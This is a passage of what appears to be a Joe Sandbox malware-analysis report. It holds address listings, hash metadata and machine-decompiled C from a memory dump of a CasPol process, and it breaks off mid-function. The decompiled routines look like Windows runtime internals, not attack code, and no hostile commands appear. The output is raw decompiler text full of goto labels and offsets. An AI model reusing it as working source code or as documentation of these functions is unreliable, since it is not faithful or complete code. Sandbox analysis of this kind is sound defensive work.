                                                                0x0163d7cc
                                                                0x0163d7d2
                                                                0x00000000
                                                                0x0163d7d4
                                                                0x0163d7d4
                                                                0x0163d7d7
                                                                0x0163d7df
                                                                0x0168b3d4
                                                                0x0168b3d9
                                                                0x0168b3dc
                                                                0x0168b3dc
                                                                0x0168b3df
                                                                0x0168b3e2
                                                                0x0168b468
                                                                0x0168b46d
                                                                0x0168b46f
                                                                0x0168b46f
                                                                0x0168b475
                                                                0x0163d8f8
                                                                0x0163d8f9
                                                                0x0163d8fd
                                                                0x0168b3e8
                                                                0x0168b3e8
                                                                0x0168b3eb
                                                                0x0168b3ed
                                                                0x00000000
                                                                0x0168b3ef
                                                                0x0168b3ef
                                                                0x0168b3f1
                                                                0x0168b3f4
                                                                0x0168b3fe
                                                                0x0168b404
                                                                0x0168b409
                                                                0x0168b40e
                                                                0x0168b410
                                                                0x0168b410
                                                                0x0168b414
                                                                0x0168b414
                                                                0x0168b41b
                                                                0x0168b420
                                                                0x0168b423
                                                                0x0168b425
                                                                0x0168b427
                                                                0x0168b42a
                                                                0x0168b42d
                                                                0x0168b42d
                                                                0x0168b42a
                                                                0x0168b432
                                                                0x0168b436
                                                                0x0168b438
                                                                0x0168b43b
                                                                0x0168b43b
                                                                0x0168b449
                                                                0x0168b44e
                                                                0x0168b454
                                                                0x0168b458
                                                                0x0168b458
                                                                0x0168b45d
                                                                0x00000000
                                                                0x0168b45d
                                                                0x0168b3ed
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0163d7df
                                                                0x0163d7d2
                                                                0x0163d7ca
                                                                0x0168b37c
                                                                0x0168b37e
                                                                0x0168b385
                                                                0x0168b38a
                                                                0x00000000
                                                                0x0168b38a
                                                                0x0163d742
                                                                0x0163d7f1
                                                                0x0163d7f8
                                                                0x0168b49b
                                                                0x0168b49b
                                                                0x0163d800
                                                                0x0163d837
                                                                0x0163d843
                                                                0x0163d845
                                                                0x0163d847
                                                                0x0163d84a
                                                                0x0163d84b
                                                                0x0163d84e
                                                                0x0163d857
                                                                0x0163d818
                                                                0x0163d824
                                                                0x0163d831
                                                                0x0168b4a5
                                                                0x0168b4ab
                                                                0x0168b4b3
                                                                0x0168b4b8
                                                                0x0168b4bb
                                                                0x00000000
                                                                0x0168b4c1
                                                                0x0168b4c1
                                                                0x0168b4c8
                                                                0x00000000
                                                                0x0168b4ce
                                                                0x0168b4d4
                                                                0x0168b4e1
                                                                0x0168b4e3
                                                                0x0168b4e5
                                                                0x00000000
                                                                0x0168b4eb
                                                                0x0168b4f0
                                                                0x0168b4f2
                                                                0x0163dac9
                                                                0x0163dacc
                                                                0x0163dacf
                                                                0x0163dad1
                                                                0x0163dd78
                                                                0x0163dd78
                                                                0x0163dcf2
                                                                0x00000000
                                                                0x0163dad7
                                                                0x0163dad9
                                                                0x0163dadb
                                                                0x00000000
                                                                0x00000000
                                                                0x0163dae1
                                                                0x0163dae1
                                                                0x0163dae4
                                                                0x0163dae6
                                                                0x0168b4f9
                                                                0x0168b4f9
                                                                0x0168b500
                                                                0x0163daec
                                                                0x0163daec
                                                                0x0163daf5
                                                                0x0163daf8
                                                                0x0163dafb
                                                                0x0163db03
                                                                0x0163db11
                                                                0x0163db16
                                                                0x0163db19
                                                                0x0163db1b
                                                                0x0168b52c
                                                                0x0168b531
                                                                0x0168b534
                                                                0x0163db21
                                                                0x0163db21
                                                                0x0163db24
                                                                0x0163dcd9
                                                                0x0163dce2
                                                                0x0163dce5
                                                                0x0163dd6a
                                                                0x0163dd6d
                                                                0x00000000
                                                                0x0163dd73
                                                                0x0168b51a
                                                                0x0168b51c
                                                                0x0168b51f
                                                                0x0168b524
                                                                0x00000000
                                                                0x0168b524
                                                                0x0163dce7
                                                                0x0163dce7
                                                                0x0163dce7
                                                                0x00000000
                                                                0x0163dce7
                                                                0x00000000
                                                                0x0163db2a
                                                                0x0163db2c
                                                                0x0163db31
                                                                0x0163db33
                                                                0x0163db36
                                                                0x0163db39
                                                                0x0163db3b
                                                                0x0163db66
                                                                0x0163db66
                                                                0x0163db3d
                                                                0x0163db3d
                                                                0x0163db3e
                                                                0x0163db46
                                                                0x0163db47
                                                                0x0163db49
                                                                0x0163db4c
                                                                0x0163db53
                                                                0x0163db55
                                                                0x0163db58
                                                                0x0163db5a
                                                                0x0168b50a
                                                                0x0168b50f
                                                                0x0168b512
                                                                0x0163db60
                                                                0x0163db60
                                                                0x0163db63
                                                                0x0163db63
                                                                0x00000000
                                                                0x0163db63
                                                                0x0163db5a
                                                                0x0163db3b
                                                                0x0163db24
                                                                0x0163db69
                                                                0x0163db69
                                                                0x0163db6c
                                                                0x0163db6f
                                                                0x0163db74
                                                                0x0168b557
                                                                0x0168b557
                                                                0x0168b55e
                                                                0x0163db7a
                                                                0x0163db7c
                                                                0x0163db7f
                                                                0x0163db82
                                                                0x0163db85
                                                                0x00000000
                                                                0x0163db8b
                                                                0x0163db8b
                                                                0x0163db8d
                                                                0x0163db9b
                                                                0x0163db9b
                                                                0x0163db9d
                                                                0x0163dba0
                                                                0x0163dba2
                                                                0x0163dba4
                                                                0x0163dba7
                                                                0x0163dba9
                                                                0x0163dbae
                                                                0x0163dbae
                                                                0x0163dbb1
                                                                0x0163dbb4
                                                                0x0163dbb4
                                                                0x0163dbb7
                                                                0x0163dbba
                                                                0x0163dcd2
                                                                0x0163dcd4
                                                                0x00000000
                                                                0x0163dbc0
                                                                0x0163dbc0
                                                                0x0163dbd2
                                                                0x0163dbd7
                                                                0x0163dbda
                                                                0x0163dbdd
                                                                0x0163dbdf
                                                                0x00000000
                                                                0x0163dbe5
                                                                0x0163dbe5
                                                                0x0163dbee
                                                                0x0163dbf1
                                                                0x0168b541
                                                                0x0168b544
                                                                0x00000000
                                                                0x0168b546
                                                                0x0168b546
                                                                0x00000000
                                                                0x0168b546
                                                                0x0163dbf7
                                                                0x0163dbf7
                                                                0x0163dbfd
                                                                0x0163dbfd
                                                                0x0163dbff
                                                                0x0163dc0b
                                                                0x0163dc15
                                                                0x0163dc1b
                                                                0x0163dc1d
                                                                0x0163dc21
                                                                0x0163dc21
                                                                0x0163dc23
                                                                0x0163dc23
                                                                0x0163dc26
                                                                0x0163dc29
                                                                0x0163dc2b
                                                                0x00000000
                                                                0x00000000
                                                                0x0163dc31
                                                                0x0163dc34
                                                                0x0163dc36
                                                                0x0163dcbf
                                                                0x0163dcbf
                                                                0x0163dcc2
                                                                0x00000000
                                                                0x0163dc3c
                                                                0x0163dc41
                                                                0x0163dc43
                                                                0x00000000
                                                                0x0163dc45
                                                                0x0163dc45
                                                                0x0163dc47
                                                                0x00000000
                                                                0x0163dc4d
                                                                0x0163dc4d
                                                                0x0163dc50
                                                                0x0163dc52
                                                                0x0163dc55
                                                                0x0163dcfa
                                                                0x0163dcfe
                                                                0x0163dd08
                                                                0x0163dd0a
                                                                0x0163dd0c
                                                                0x00000000
                                                                0x0163dd12
                                                                0x0163dd15
                                                                0x0163dd2d
                                                                0x0163dd2f
                                                                0x0163dd32
                                                                0x0163dd35
                                                                0x00000000
                                                                0x0163dd35
                                                                0x0163dc5b
                                                                0x0163dc5b
                                                                0x0163dc5e
                                                                0x0163dc61
                                                                0x0163dc64
                                                                0x0163dc67
                                                                0x0163dc67
                                                                0x0163dc6a
                                                                0x0163dc6c
                                                                0x0163dc8e
                                                                0x0163dc8e
                                                                0x0163dc91
                                                                0x0163dc93
                                                                0x0163dcce
                                                                0x0163dcce
                                                                0x0163dc95
                                                                0x0163dc9c
                                                                0x0163dc6e
                                                                0x0163dc72
                                                                0x0163dc75
                                                                0x0163dc77
                                                                0x0163dc79
                                                                0x0168b551
                                                                0x0168b551
                                                                0x00000000
                                                                0x0163dc7f
                                                                0x0163dc7f
                                                                0x0163dc81
                                                                0x00000000
                                                                0x0163dc83
                                                                0x0163dc86
                                                                0x0163dc88
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0163dc88
                                                                0x0163dc81
                                                                0x0163dc79
                                                                0x0163dc6c
                                                                0x0163dc55
                                                                0x0163dc47
                                                                0x0163dc43
                                                                0x00000000
                                                                0x0163dc36
                                                                0x0163dc23
                                                                0x00000000
                                                                0x0163dbff
                                                                0x0163dbf1
                                                                0x0163dbdf
                                                                0x0163db8f
                                                                0x0163db92
                                                                0x0163db95
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0163db95
                                                                0x0163db8d
                                                                0x0163db85
                                                                0x0163db74
                                                                0x0163dc9f
                                                                0x0163dca2
                                                                0x0163dcb0
                                                                0x0163dcb0
                                                                0x0163dad1
                                                                0x0168b4e5
                                                                0x0168b4c8
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0163d831
                                                                0x00000000
                                                                0x0163d800
                                                                0x0168b47f
                                                                0x0168b485
                                                                0x00000000
                                                                0x0168b485
                                                                0x0163d665
                                                                0x0163d652
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a9e4bc780eb4c73ff03b1cd94135fd9ca92ecb00e6460c6b3b9ed7fff2361d41
                                                                • Instruction ID: 63b70bddec4a4154a76a6f74f017297fbc52b43f5c977f6fb544f91ef3b508b0
                                                                • Opcode Fuzzy Hash: a9e4bc780eb4c73ff03b1cd94135fd9ca92ecb00e6460c6b3b9ed7fff2361d41
                                                                • Instruction Fuzzy Hash: D0E1CE70A0125A8FEB35DF6CCC90BB9BBB2BF86314F4542ADD90997391D730A981CB51
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0163849B Relevance: .3, Instructions: 290COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 92%
                                                                			E0163849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x16ff9c0);
				E0167D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x1717b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0163CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E01642280( *[fs:0x30], 0x1718550);
						_t139 =  *0x1717b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0165F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0163FFB0(_t193, _t235, 0x1718550);
								L5:
								return E0167D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E01621C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1717b9c; // 0x0
							_t235 = L01644620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x1717b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0165A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E0163FFB0(_t193, _t235, 0x1718550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L016477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L016477F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1717b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1717b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E016637C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1717b9c; // 0x0
									_t214 = L01644620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E016637F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1717b10 =  *0x1717b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1717b04 =  *0x1717b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L016477F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L016477F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1717b08 =  *0x1717b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E016657C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0166F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L016477F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0165A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L016477F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E016696C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                0x0163849b
                                                                0x0163849b
                                                                0x0163849b
                                                                0x0163849b
                                                                0x0163849d
                                                                0x016384a2
                                                                0x016384a7
                                                                0x016384b1
                                                                0x016384d8
                                                                0x00000000
                                                                0x016384b3
                                                                0x016384c4
                                                                0x016384c9
                                                                0x016384cd
                                                                0x016384cf
                                                                0x016384cf
                                                                0x016384d6
                                                                0x016384e6
                                                                0x016384e9
                                                                0x016384ec
                                                                0x016384ef
                                                                0x016384f2
                                                                0x016384f4
                                                                0x016384fc
                                                                0x01638501
                                                                0x01638506
                                                                0x01638509
                                                                0x016386e0
                                                                0x016386e5
                                                                0x016386e8
                                                                0x016386ed
                                                                0x016386f0
                                                                0x016386f2
                                                                0x01689afd
                                                                0x01689b02
                                                                0x016384da
                                                                0x016384df
                                                                0x016384df
                                                                0x016386fa
                                                                0x016386fd
                                                                0x016386fe
                                                                0x01638701
                                                                0x01638706
                                                                0x01638709
                                                                0x0163870b
                                                                0x00000000
                                                                0x00000000
                                                                0x01638711
                                                                0x01638725
                                                                0x01638727
                                                                0x0163872a
                                                                0x0163872c
                                                                0x01689af0
                                                                0x01689af5
                                                                0x01638732
                                                                0x01638732
                                                                0x01638732
                                                                0x01638735
                                                                0x01638737
                                                                0x01638515
                                                                0x01638515
                                                                0x01638518
                                                                0x0163851d
                                                                0x01638523
                                                                0x01638527
                                                                0x0163852b
                                                                0x01638537
                                                                0x01638539
                                                                0x0163853c
                                                                0x0163853e
                                                                0x0163868c
                                                                0x01638691
                                                                0x01638699
                                                                0x0163869b
                                                                0x01638744
                                                                0x01638748
                                                                0x016386a1
                                                                0x016386a1
                                                                0x016386a1
                                                                0x016386a4
                                                                0x016386a8
                                                                0x01689bdf
                                                                0x01689bdf
                                                                0x016386ae
                                                                0x016386b0
                                                                0x00000000
                                                                0x016386b6
                                                                0x00000000
                                                                0x01689be9
                                                                0x016386b0
                                                                0x01638544
                                                                0x0163854a
                                                                0x0163854d
                                                                0x01638551
                                                                0x0163876e
                                                                0x01638778
                                                                0x0163877b
                                                                0x01638780
                                                                0x01638557
                                                                0x01638557
                                                                0x0163855d
                                                                0x0163855d
                                                                0x0163856b
                                                                0x0163856e
                                                                0x01638570
                                                                0x01638573
                                                                0x01638576
                                                                0x01638576
                                                                0x01638579
                                                                0x0163857b
                                                                0x00000000
                                                                0x00000000
                                                                0x01638581
                                                                0x016385a0
                                                                0x016385a2
                                                                0x016385a5
                                                                0x016385a7
                                                                0x01689b1b
                                                                0x01689b1b
                                                                0x0163862e
                                                                0x0163862e
                                                                0x01638631
                                                                0x01638631
                                                                0x01638634
                                                                0x01638636
                                                                0x01638669
                                                                0x01638669
                                                                0x0163866b
                                                                0x01689bbf
                                                                0x01689bc4
                                                                0x01689bc8
                                                                0x01689bce
                                                                0x01689bce
                                                                0x01638671
                                                                0x01638671
                                                                0x01638674
                                                                0x01638676
                                                                0x01689bae
                                                                0x01689bae
                                                                0x01638676
                                                                0x0163867c
                                                                0x0163867e
                                                                0x01638688
                                                                0x01638688
                                                                0x00000000
                                                                0x0163867e
                                                                0x01638638
                                                                0x01638638
                                                                0x0163863b
                                                                0x0163863e
                                                                0x0163863f
                                                                0x01638642
                                                                0x01638645
                                                                0x01638648
                                                                0x0163864d
                                                                0x01689b69
                                                                0x01689b6e
                                                                0x01689b7b
                                                                0x01689b81
                                                                0x01689b85
                                                                0x01689b89
                                                                0x01689ba7
                                                                0x01689b8b
                                                                0x01689b91
                                                                0x01689b9a
                                                                0x01689b9f
                                                                0x01689b9f
                                                                0x01638788
                                                                0x0163878d
                                                                0x01638763
                                                                0x01638763
                                                                0x01638766
                                                                0x00000000
                                                                0x01638766
                                                                0x01689b70
                                                                0x00000000
                                                                0x01689b70
                                                                0x01638656
                                                                0x0163865a
                                                                0x0163865c
                                                                0x01638752
                                                                0x01638756
                                                                0x00000000
                                                                0x00000000
                                                                0x0163875e
                                                                0x00000000
                                                                0x0163875e
                                                                0x01638662
                                                                0x01638662
                                                                0x01638662
                                                                0x01638666
                                                                0x00000000
                                                                0x01638666
                                                                0x016385b7
                                                                0x016385b9
                                                                0x016385bc
                                                                0x016385bf
                                                                0x016385cc
                                                                0x016385d1
                                                                0x016385d4
                                                                0x016385db
                                                                0x016385de
                                                                0x016385e0
                                                                0x01689b5f
                                                                0x00000000
                                                                0x01689b5f
                                                                0x016385e6
                                                                0x016385ea
                                                                0x016386c3
                                                                0x016386c5
                                                                0x016386c8
                                                                0x016386ca
                                                                0x01689b16
                                                                0x00000000
                                                                0x01689b16
                                                                0x016386d6
                                                                0x016385f6
                                                                0x016385f6
                                                                0x016385f9
                                                                0x01638602
                                                                0x01638606
                                                                0x0163860a
                                                                0x0163860b
                                                                0x0163860e
                                                                0x01638611
                                                                0x00000000
                                                                0x01638611
                                                                0x016385f3
                                                                0x00000000
                                                                0x016385f3
                                                                0x01638619
                                                                0x0163861e
                                                                0x0163861e
                                                                0x01638621
                                                                0x01638622
                                                                0x01638623
                                                                0x01638625
                                                                0x0163862c
                                                                0x00000000
                                                                0x0163873d
                                                                0x00000000
                                                                0x0163873d
                                                                0x01638737
                                                                0x0163850f
                                                                0x01638512
                                                                0x00000000
                                                                0x01638512
                                                                0x00000000
                                                                0x016384d6

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5744675362da91c9734312dce856c424de496282beb9180d3e50edec905f097e
                                                                • Instruction ID: 881dfcfcd1ab021e7dcb6bbea2fe75ac2ee13d719d91e0f2e3cf4a413598ece7
                                                                • Opcode Fuzzy Hash: 5744675362da91c9734312dce856c424de496282beb9180d3e50edec905f097e
                                                                • Instruction Fuzzy Hash: 9BB13C70E00219DFDB25DFA9CD84AEEBBBABF85304F10422DE505AB345D774A945CB50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165513A Relevance: .3, Instructions: 258COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 67%
                                                                			E0165513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x171d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0166D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E01642280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L01644620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
